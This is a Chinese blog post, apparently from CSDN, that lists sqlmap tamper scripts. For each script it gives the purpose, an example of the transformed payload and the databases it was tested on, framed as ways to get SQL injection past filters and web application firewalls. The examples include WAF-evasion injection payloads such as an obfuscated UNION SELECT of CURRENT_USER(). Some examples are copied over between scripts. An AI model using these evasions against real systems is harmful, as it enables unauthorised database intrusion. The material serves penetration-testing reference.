sqlmap tamper mysql_Sqlmap Tamper大全(1)

最新推荐文章于 2024-05-22 11:02:40 发布
最新推荐文章于 2024-05-22 11:02:40 发布
阅读量327 收藏 2
点赞数
文章标签: sqlmap tamper mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39522423/article/details/113218086
版权
本文详细介绍了SQLMap中的Tamper目录下多个插件,如apostrophemask.py、equaltolike.py、space2dash.py等,这些插件用于绕过过滤、替换特殊字符,以提高SQL注入攻击效率。内容包括每个插件的作用、示例和测试环境。
摘要由CSDN通过智能技术生成

8f900a89c6347c561fdf2122f13be562.png

961ddebeb323a10fe0623af514929fc1.png

1 * Input: 1 AND 9227=9227

2 *Output:1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

View Code

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。在许多情况下你可以通过使用sqlmap中的tamper脚本来对目标进行更高效的攻击。

本文旨在介绍tamper目录中的大部分插件,其中有的部分网上已经有了。

脚本名:apostrophemask.py

作用:用utf8代替引号

Example:

Default

1

2

("1 AND '1'='1")

'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

Tested against:

all

—————————————————————————————

文件名:equaltolike.py

作用:like 代替等号

Example:

Default

1

2

*Input:SELECT *FROM users WHERE id=1

*Output:SELECT *FROM users WHERE id LIKE1

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

—————————————————————————————

脚本名:space2dash.py

作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)

Example:

Default

1

2

('1 AND 9227=9227')

'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

Tested against:

* MSSQL

* SQLite

—————————————————————————————

脚本名:greatest.py

作用:绕过过滤’>’ ,用GREATEST替换大于号。

Example:

Default

1

2

('1 AND A > B')

'1 AND GREATEST(A,B+1)=A'

Tested against:

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

——————————————————

脚本名:space2hash.py

作用:空格替换为#号 随机字符串 以及换行符

Example:

Default

1

2

*Input:1AND9227=9227

*Output:1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement:

* MySQL

Tested against:

* MySQL 4.0, 5.0

——————————————————

脚本名:apostrophenullencode.py

作用:绕过过滤双引号,替换字符和双引号。

Example:

Default

1

2

tamper("1 AND '1'='1")

'1 AND %00%271%00%27=%00%271'

Tested against:

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

——————————————————

脚本名:halfversionedmorekeywords.py

作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

Example:

Default

1

2

("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

Requirement:

* MySQL < 5.1

Tested against:

* MySQL 4.0.18, 5.0.22

———————————————–

脚本名:space2morehash.py

作用:空格替换为 #号 以及更多随机字符串 换行符

Example:

Default

1

2

*Input:1AND9227=9227

*Output:1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement:

* MySQL >= 5.1.13

Tested against:

* MySQL 5.1.41

——————————————

脚本名:appendnullbyte.py

作用:在有效负荷结束位置加载零字节字符编码

Example:

Default

1

2

('1 AND 1=1')

'1 AND 1=1%00'

Requirement:

* Microsoft Access

——————————————

脚本名:ifnull2ifisnull.py

作用:绕过对 IFNULL 过滤。

替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

Example:

Default

1

2

('IFNULL(1, 2)')

'IF(ISNULL(1),2,1)'

Requirement:

* MySQL

* SQLite (possibly)

* SAP MaxDB (possibly)

Tested against:

* MySQL 5.0 and 5.5

——————————————

脚本名:space2mssqlblank.py(mssql)

作用:空格替换为其它空符号

Example:

Default

1

2

*Input:SELECT id FROM users

*Output:SELECT%08id%02FROM%0Fusers

Requirement:

* Microsoft SQL Server

Tested against:

* Microsoft SQL Server 2000

* Microsoft SQL Server 2005

# ASCII table:

Default

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

#   SOH     01      start of heading

#   STX     02      start of text

#   ETX     03      end of text

#   EOT     04      end of transmission

#   ENQ     05      enquiry

#   ACK     06      acknowledge

#   BEL     07      bell

#   BS      08      backspace

#   TAB     09      horizontal tab

#   LF      0A      new line

#   VT      0B      vertical TAB

#   FF      0C      new page

#   CR      0D      carriage return

#   SO      0E      shift out

#   SI      0F      shift in

————————————————-

关于Sqlmap Tamper的使用参考:《如何使用SQLMap绕过WAF》《sqlmap用户手册》

via@凌霄飞龙

weixin_39522423
关注
sqlmap常用绕过脚本
L_lemo004的博客
10-20 1301
使用方法–tamper xxx.py apostrophemask.py用UTF-8全角字符替换单引号字符 apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 appendnullbyte.py在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base64编码 between.py分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=” bluec
sqlmap tamper mysql_SqlMap 1.2.7.20 Tamper详解及使用指南
weixin_42500789的博客
01-19 350
sqlmap是一款人见人爱的自动化SQL渗透工具,能够以良好的引擎发现给定URL中的可注入处,并自动化的完成注入。但是由于SQL注入的影响过于广泛,致使现代程序的防护越来越严密。sqlmap/tamper是官方给出的一些绕过脚本,可以配合渗透测试人员完成更高效更高质量的测试。本文共分为三个部分,第一部分简要对tamper进行介绍,以及为何要使用它,如何使用;第二部分给出当前最新版本(1.2.7-2...
sqlmap tamper mysql_sqlmap tamper的使用
weixin_35615591的博客
01-19 177
前言在早之前我对于tamper的使用一直都是停留在错误的思维。想着bypass,应该要先手动fuzz出规则来,然后再写成tamper使用。直到今天,才察觉根本不需要一定要fuzz出具体的规则来,无脑堆叠tamper,只要能够过就行了。而且sqlmap上面有那么多bypass 的tamper不使用是不是太浪费了?普通tamper搭配方式:tamper=apostrophemask,apostroph...
sqlmap tamper mysql_sqlmap之常用tamper脚本
weixin_42517963的博客
01-25 345
常用tamper脚本apostrophemask.py适用数据库:ALL作用:将引号替换为utf-8,用于过滤单引号使用脚本前:tamper("1 AND '1'='1")使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871base64encode.py适用数据库:ALL作用:替换为base64编码使用脚本前:tamper("1' AND SLEEP(5)#")使用...
sqlmap tamper mysql_SQLMAP Tamper
weixin_39924779的博客
01-30 96
apostrophemask.pyFunction:用utf8编码引号Platform:Allexample11 AND '1'='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871apostrophenullencode.pyFunction:‘==> %00%27Platform: Allexample11 AND '1'='1 ==> 1 ...
SQLMaptamper的简介
热门推荐
super_m@n的博客
04-06 1万+
目录结构 一、SQLMaptamper的简介 1.tamper的作用 2.tamper用法 二、适配不同数据库类型的测试tamper 三、SQLMaptamper篡改脚本的功能解释 一、SQLMaptamper的简介 1.tamper的作用 使用SQLMap提供的tamper脚本,可在一定程度上避开应用程序的敏感字符过滤、绕过WAF规则的阻挡,继而进行渗透攻击。 部分...
1、Sqlmap Tamper脚本编写介绍-01
09-15
Sqlmap Tamper脚本编写介绍 Sqlmap Tamper脚本是对Sqlmap工具的扩展,主要功能是对原本的payload进行特定的更改以绕过WAF。Tamper脚本结构主要包括三个部分:Tamper脚本结构介绍、Tamper函数介绍和dependencies函数...
SQLMapTamper.docx
09-26
SQLMapTamper SQLMap 是一个功能强大的 SQL 注入攻击工具,它提供了 tamper 脚本来帮助攻击者绕过应用程序的敏感字符过滤和 WAF 规则的阻挡,从而进行渗透攻击。tamper 脚本可以在一定程度上避开应用程序的敏感...
ThinkPHPSQL0day:ThinkPHP3.0~3.3 betweenSQL注入的sqlmap Tamper
07-02
"sqlmap Tamper"指的是sqlmap工具中的Tamper模块,这是一个自动化SQL注入工具,用于绕过目标系统的防御机制,帮助检测和利用SQL注入漏洞。 【描述解析】 描述简单地重复了标题的关键信息,强调了这是关于ThinkPHP 3...
3 、Sqlmap Tamper脚本分析(MSSQL)-01
09-15
Sqlmap Tamper脚本可以支持多种数据库,包括MSSQL、MySQL、PostgreSQL等。其中,MSSQL Tamper脚本是专门为MSSQL数据库设计的,能够对MSSQL数据库进行攻击和渗透测试。MSSQL Tamper脚本可以根据不同的payload对MSSQL...
sqlmap-tamper说明大全
10-03
本文档主要说明sqlmaptamper使用情况以及主要使用方法,很全的说明文档。
sqlmap绕过过滤的 tamper 脚本分类汇总(1).xlsx
12-10
sqlmap绕过过滤的 tamper 脚本分类汇总(1).xlsx
SQLMapTamper脚本
m0_62207482的博客
01-31 3403
SQLMap是一款用来检测与利用SQL注入漏洞的免费 开源工具,不仅可以实现SQL注入漏洞的检测与利用的自动化处理,而且其自带 的Tamper脚本可以帮助我们绕过IDS/WAF的检测。虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站 的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个 时候就需要我们针对目标的防护体系手动构建相应的Tamper脚本。Tamper脚本的构建非常简单,其实渗透测试中真正的难点在于如何针对目标 网站的防护找出对应的绕过方法。
sqlmap tamper mysql_(四)SQLMapTamper篡改脚本的类型、作用、适用场景
weixin_39765209的博客
01-30 322
目录结构一、SQLMaptamper的简介1.tamper的作用使用SQLMap提供的tamper脚本,可在一定程度上避开应用程序的敏感字符过滤、绕过WAF规则的阻挡,继而进行渗透攻击。部分防护系统的缩写:WAF:Web应用程序防火墙,Web Application FirewallIPS:入侵防御系统, Intrusion Prevention SystemIDS:入侵检测系统,Intrusi...
sqlmap tamper脚本_总结一些SqlMap的常用tamper脚本释义
weixin_39631007的博客
11-26 834
要想成为一名合格的“脚本小子”,我们首先需要一个强大的工具,然后利用好他的脚本。但是脚本也不能乱用,首先就是要了解一下SqlMap的常用的脚本,然后分清楚场合进行利用。(好的,看开头又是一篇水文。) 刚刚也看到了咱们论坛有个帖子和这个内容差不多,我没有数我总结了多少个,但是希望我们两个的内容是可以相互补充的。(刚刚群里大佬说,这种文章还用总结?百度一搜一大堆~~ ...
sqlmap tamper mysql_SQLmap使用tamper绕过WAF防火墙过滤
weixin_30291543的博客
01-30 316
如何判断使用哪个脚本最简单的办法就是在url参数中手工带入关键词,判断是否被过滤。如图:直接加个单引号被过滤,说明注入时单引号是没法用的。空格、等于号都没有过滤,成功报错。select被过滤。以此类推,当sqlmap注入出现问题时,比如不出数据,就要检查对应的关键词是否被过滤。比如空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等。下面对...
sqlmap 使用tamper脚本绕过WAF
最新发布
xf3401837266的博客
05-22 1292
sqlmap 使用tamper脚本绕过WAF
SQLMap——Tamper学习
weixin_44522540的博客
05-03 2843
一、简介 sqlmap是一款用来检测与利用SQL注入漏洞的免费工具,不仅可以实现SQL注入漏洞的检测和利用的自动化处理,自带的Tamper脚本可以帮助我们绕过IDS/WAF的检测。 二、Tamper脚本 部分Tamper脚本如图: 虽然sqlmap提供了许多Tamper脚本,但实际使用过程中网站可能过滤了许多敏感字符和相关函数,这就需要我们能够针对防护规则手动构建相应的Tamper脚本。 三、Tamper结构 #!/usr/bin/env python  """ Copyright (c) 20
sqlmap --tamper 绕过WAF脚本分类
→_→
08-25 407
笔记: 支持的数据库 编号 脚本名称 作用 实现方式 all 1 apostrophemask.py 用utf8代替引号 ("1AND'1'='1") '1AND%EF%BC%871%EF%BC%87=%EF%BC%871' 2 base64encode.py 用base64编码替换 ("1'ANDSLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' 3 multi...
SQLMap tamper脚本:绕过WAF与渗透测试指南
"SQLMapTamper文档详细介绍了如何使用SQLMaptamper脚本来绕过Web应用程序的敏感字符过滤和WAF规则,以便进行渗透测试。文档涵盖了tamper脚本的作用、用法以及针对不同数据库类型的tamper脚本选择。" 在网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值